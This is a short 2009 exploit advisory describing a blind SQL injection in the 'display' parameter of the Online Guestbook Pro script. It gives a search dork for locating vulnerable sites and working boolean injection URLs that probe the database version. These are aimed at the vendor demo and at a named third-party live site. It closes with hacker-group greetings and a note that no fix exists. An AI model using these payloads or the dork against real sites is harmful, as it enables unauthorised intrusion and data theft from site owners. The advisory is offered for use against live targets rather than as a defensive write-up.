Online Guestbook Pro (display) Blind SQL Injection Vulnerability

2009-04-17 22:33:43




{____________________________________}
Author: Hussin X

Home : WwW.IQ-TY.CoM

email: darkangel_g85[at]Yahoo[DoT]com
{____________________________________}



script : http://www.esoftpro.com/web_scripts_online_guestbook_pro.php

DorK : Powered by Online Guestbook Pro




Demo :

http://www.esoftpro.com/demo/OGP/ogp_show.php?display=10 and substring(@@version,1,1)=5

http://www.esoftpro.com/demo/OGP/ogp_show.php?display=10 and substring(@@version,1,1)=4

BuT Results = Forbidden :D


demo to any web

http://www.musicandfriends.ca/guestbook/ogp_show.php?display=10 and substring(@@version,1,1)=5

http://www.musicandfriends.ca/guestbook/ogp_show.php?display=10 and substring(@@version,1,1)=4





Greetz to :{ IQ-SecuritY members } { | FAHD | CraCkEr | jiko | str0ke | Cyber-Zone | kadmiwe | ahmed hassan | Sakab }

end.

#

Fixes

No fixes

In order to submit a new fix you need to be registered.